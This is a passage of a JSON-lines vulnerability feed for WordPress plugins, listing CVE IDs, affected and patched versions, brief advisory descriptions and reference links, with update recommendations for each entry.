{"CVE_ID":"CVE-2025-24588","slug":"patreon-connect","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"Missing Authorization vulnerability in Patreon Patreon WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Patreon WordPress: from n\/a through 1.9.1.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/patreon-connect\\\/vulnerability\\\/wordpress-patreon-wordpress-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/patreon-connect\\\/vulnerability\\\/wordpress-patreon-wordpress-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52135","slug":"ws-form","versionEndExcluding":"1.9.171","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WS Form WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress.This issue affects WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress: from n\/a through 1.9.170.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ws-form\\\/wordpress-ws-form-lite-drag-drop-contact-form-builder-for-wordpress-plugin-1-9-170-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ws-form\\\/wordpress-ws-form-lite-drag-drop-contact-form-builder-for-wordpress-plugin-1-9-170-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6289","slug":"wps-hide-login","versionImpact":"1.9.16.3","versionEndExcluding":"1.9.16.4","description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.","recommendation":"Update to version 1.9.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6d0362-df1d-4416-b8b5-6e5d0ce84793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6d0362-df1d-4416-b8b5-6e5d0ce84793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2473","slug":"wps-hide-login","versionImpact":"1.9.15.2","versionEndExcluding":"1.9.16","description":"The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.","recommendation":"Update to version 1.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd21c7d3-a5f1-4c3a-b6ab-0a979f070a62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd21c7d3-a5f1-4c3a-b6ab-0a979f070a62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099109\\\/wps-hide-login\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099109\\\/wps-hide-login\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10543","slug":"tumult-hype-animations","versionImpact":"1.9.14","versionEndExcluding":"1.9.15","description":"The Tumult Hype Animations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hypeanimations_getcontent function in all versions up to, and including, 1.9.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve animation information.","recommendation":"Update to version 1.9.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7273526e-bb51-418f-9ac8-8832f2de1cd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7273526e-bb51-418f-9ac8-8832f2de1cd6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182537%40tumult-hype-animations&new=3182537%40tumult-hype-animations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182537%40tumult-hype-animations&new=3182537%40tumult-hype-animations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9582","slug":"accordion-slider","versionImpact":"1.9.11","versionEndExcluding":"1.9.12","description":"The Accordion Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018html\u2019 attribute of an accordion slider in all versions up to, and including, 1.9.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Successful exploitation by Contributor-level users requires an Administrator-level user to provide access to the plugin's admin area via the `Access` plugin setting, which is restricted to administrators by default.","recommendation":"Update to version 1.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f19f56-0667-443e-8545-a17fbe9c3ddb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f19f56-0667-443e-8545-a17fbe9c3ddb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166480\\\/accordion-slider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166480\\\/accordion-slider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4324","slug":"wp-video-lightbox","versionImpact":"1.9.10","versionEndExcluding":"1.9.11","description":"The WP Video Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2d8494-aea3-4a1e-9eca-946c0bd390cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2d8494-aea3-4a1e-9eca-946c0bd390cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-video-lightbox\\\/trunk\\\/misc_functions.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-video-lightbox\\\/trunk\\\/misc_functions.php#L60\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5998","slug":"password-protect-page","versionImpact":"1.9.10","versionEndExcluding":"1.9.11","description":"The PPWP \u2013 Password Protect Pages WordPress plugin before version 1.9.11 allows to put the site content behind a password authorization, however users with subscriber or greater roles can view content via the REST API.","recommendation":"Update to version 1.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7056","slug":"wpforms-lite","versionImpact":"1.9.1.5","versionEndExcluding":"1.9.1.6","description":"The WPForms  WordPress plugin before 1.9.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/467af13e-25bd-425c-929d-5dd06e28d595\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/467af13e-25bd-425c-929d-5dd06e28d595\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4436","slug":"3dprint-lite","versionEndExcluding":"1.9.1.5","description":"The 3DPrint Lite WordPress plugin before 1.9.1.5 does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.","recommendation":"Update to version 1.9.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c46ecd0d-a132-4ad6-b936-8acde3a09282\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c46ecd0d-a132-4ad6-b936-8acde3a09282\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3692","slug":"gutenverse","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Gutenverse  WordPress plugin before 1.9.1 does not validate the htmlTag option in various of its block before outputting it back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f100f85-3a76-44be-8092-06eb8595b0c9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f100f85-3a76-44be-8092-06eb8595b0c9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12600","slug":"woocommerce-custom-product-tabs-lite","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Custom Product Tabs Lite for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.0 via deserialization of untrusted input from the 'frs_woo_product_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-custom-product-tabs-lite\\\/trunk\\\/woocommerce-custom-product-tabs-lite.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-custom-product-tabs-lite\\\/trunk\\\/woocommerce-custom-product-tabs-lite.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226839\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226839\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c16b47-3202-4f26-bf45-98172b8cac45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c16b47-3202-4f26-bf45-98172b8cac45?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7388","slug":"wp-bannerize-pro","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The WP Bannerize Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via banner alt data in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba08dbad-15f9-43cf-b0d7-a2a4604cb4af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba08dbad-15f9-43cf-b0d7-a2a4604cb4af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133241\\\/wp-bannerize-pro\\\/trunk\\\/plugin\\\/CustomPostTypes\\\/WPBannerizeCustomPostType.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133241\\\/wp-bannerize-pro\\\/trunk\\\/plugin\\\/CustomPostTypes\\\/WPBannerizeCustomPostType.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11757","slug":"wp-geonames","versionImpact":"1.9.0.1","versionEndExcluding":"1.9.1","description":"The WP GeoNames plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-geonames' shortcode in all versions up to, and including, 1.9.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203122%40wp-geonames&new=3203122%40wp-geonames&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203122%40wp-geonames&new=3203122%40wp-geonames&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/930802e6-437b-437a-b530-7992094073f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/930802e6-437b-437a-b530-7992094073f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0159","slug":"extensive-vc-addon","versionEndExcluding":"1.9.1","description":"The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/239ea870-66e5-4754-952e-74d4dd60b809\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/239ea870-66e5-4754-952e-74d4dd60b809\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5532","slug":"campus-directory","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Campus Directory \u2013 Faculty, Staff & Student Directory Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3303022%40campus-directory&new=3303022%40campus-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3303022%40campus-directory&new=3303022%40campus-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20301685-9b76-4dd3-8185-3a4463f3201b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20301685-9b76-4dd3-8185-3a4463f3201b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4104","slug":"admin-form","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dbp_id' parameter in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e61110fc-cc2d-4207-97b6-b21459334216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e61110fc-cc2d-4207-97b6-b21459334216?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081090%40admin-form&new=3081090%40admin-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081090%40admin-form&new=3081090%40admin-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4103","slug":"admin-form","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.0. This is due to missing or incorrect nonce validation on several functions hooked via the controller() function. This makes it possible for unauthenticated attackers to edit the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081090\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081090\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d797238-f8f3-44d7-8c16-bee23ce12ae0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d797238-f8f3-44d7-8c16-bee23ce12ae0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37430","slug":"patreon-connect","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"Authentication Bypass by Spoofing vulnerability in Patreon Patreon WordPress allows Functionality Misuse.This issue affects Patreon WordPress: from n\/a through 1.9.0.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-9-0-image-protection-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-9-0-image-protection-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11972","slug":"hunk-companion","versionImpact":"1.8.5","versionEndExcluding":"1.9.0","description":"The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary Hunk Companion WordPress plugin before 1.9.0 from the WordPress.org repo, including vulnerable Hunk Companion WordPress plugin before 1.9.0 that have been closed.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4963560b-e4ae-451d-8f94-482779c415e4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4963560b-e4ae-451d-8f94-482779c415e4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8618","slug":"pagelayer","versionImpact":"1.8.9","versionEndExcluding":"1.9.0","description":"The Page Builder: Pagelayer  WordPress plugin before 1.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acddcf33-0a18-499e-b42d-c8b49f2c4de5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acddcf33-0a18-499e-b42d-c8b49f2c4de5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11894","slug":"the-permalinker","versionImpact":"1.8.1","versionEndExcluding":"1.9.0","description":"The The Permalinker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'permalink' shortcode in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-permalinker\\\/trunk\\\/the-permalinker.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-permalinker\\\/trunk\\\/the-permalinker.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7963","slug":"cmsmasters-content-composer","versionImpact":"1.8.8","versionEndExcluding":"1.9.0","description":"The CMSMasters Content Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's multiple shortcodes in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42c1d2ea-dea6-4cde-8db3-37709da9eb71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42c1d2ea-dea6-4cde-8db3-37709da9eb71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/cmsmasters.net\\\/\",\"name\":\"http:\\\/\\\/cmsmasters.net\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4675","slug":"facebook-page-feed-graph-api","versionEndExcluding":"1.9.0","description":"The Mongoose Page Plugin WordPress plugin before 1.9.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21f4cc5d-c4b4-495f-acf3-9fdf53591052\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21f4cc5d-c4b4-495f-acf3-9fdf53591052\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4443","slug":"brutebank","versionEndExcluding":"1.9","description":"The BruteBank WordPress plugin before 1.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e621d62-13c7-4b2f-96ca-3617a796d037\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e621d62-13c7-4b2f-96ca-3617a796d037\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4774","slug":"bit-form","versionEndExcluding":"1.9","description":"The Bit Form WordPress plugin before 1.9 does not validate the file types uploaded via it's file upload form field, allowing unauthenticated users to upload arbitrary files types such as PHP or HTML files to the server, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ae5c375-a6a0-4c0b-a9ef-e4d2a28bce5e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ae5c375-a6a0-4c0b-a9ef-e4d2a28bce5e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-25117","slug":"wp-postratings","versionImpact":"1.86","versionEndExcluding":"1.86.1","description":"The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin\/admin.php?page=wp-postratings\/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.","recommendation":"Update to version 1.86.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2d9a789-edae-4ae1-92af-e6132db7efcd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2d9a789-edae-4ae1-92af-e6132db7efcd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2387","slug":"advanced-form-integration","versionImpact":"1.82.0","versionEndExcluding":"1.82.6","description":"The Advanced Form Integration \u2013 Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms plugin for WordPress is vulnerable to SQL Injection via the \u2018integration_id\u2019 parameter in all versions up to, and including, 1.82.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries and subsequently inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.82.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0429","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The \"AI Power: Complete AI Pack\" plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.8.96 via deserialization of untrusted input from the $form['post_content'] variable through the wpaicg_export_ai_forms() function. This allows authenticated attackers, with administrative privileges, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.8.97, or a newer patched 